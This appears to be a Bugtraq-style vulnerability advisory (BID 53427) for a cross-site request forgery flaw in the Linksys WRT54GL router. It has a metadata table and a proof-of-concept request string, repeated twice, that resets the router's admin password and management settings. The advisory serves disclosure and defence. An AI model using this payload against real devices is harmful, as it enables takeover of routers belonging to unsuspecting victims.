Linksys WRT54GL Wireless Router Cross-Site Request Forgery Vulnerability
BID:53427
Info
Linksys WRT54GL Wireless Router Cross-Site Request Forgery Vulnerability
| Bugtraq ID: | 53427 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 08 2012 12:00AM |
| Updated: | May 08 2012 12:00AM |
| Credit: | Kalashinkov3 |
| Vulnerable: |
Linksys WRT54GL 0 |
| Not Vulnerable: | |
Exploit / POC
Linksys WRT54GL Wireless Router Cross-Site Request Forgery Vulnerability
To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.
The following proof-of-concept is available:
submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=YOUR PASSWORD&http_passwdConfirm=YOUR PASSWORD&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1
To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.
The following proof-of-concept is available:
submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=YOUR PASSWORD&http_passwdConfirm=YOUR PASSWORD&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1